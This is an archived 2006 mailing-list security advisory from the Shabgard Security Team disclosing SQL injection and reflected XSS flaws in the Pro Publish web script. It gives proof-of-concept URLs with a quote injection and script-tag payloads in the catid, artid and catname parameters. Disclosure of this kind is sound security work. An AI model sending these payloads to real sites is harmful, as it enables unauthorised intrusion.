|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Pro Publish SQL Injection and XSS Vulnerabilities
Soothackers
gmail.com
Date: Fri Jun 02 2006 - 12:25:40 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
---------------------------------------------
Pro Publish SQL Injection and XSS Vulnerabilities
---------------------------------------------
Site:
http://www.deltascripts.com/download/
Bug:
1. SQL Injection :
http://victim/propublish/cat.php?catid='
2. XSS :
1- http://victim/propublish/art.php?artid="><script>alert(/Soot/)</script>
2- http://victim/propublish/cat.php?catname="><script>alert(/Soot/)</script>
---------------------------------------------
Source :
http://soot.shabgard.org/bugs/propublish.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org
Greetz :
Hregy,Elite,Bl2k,Littlehacker,Sasan_4shir
---------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]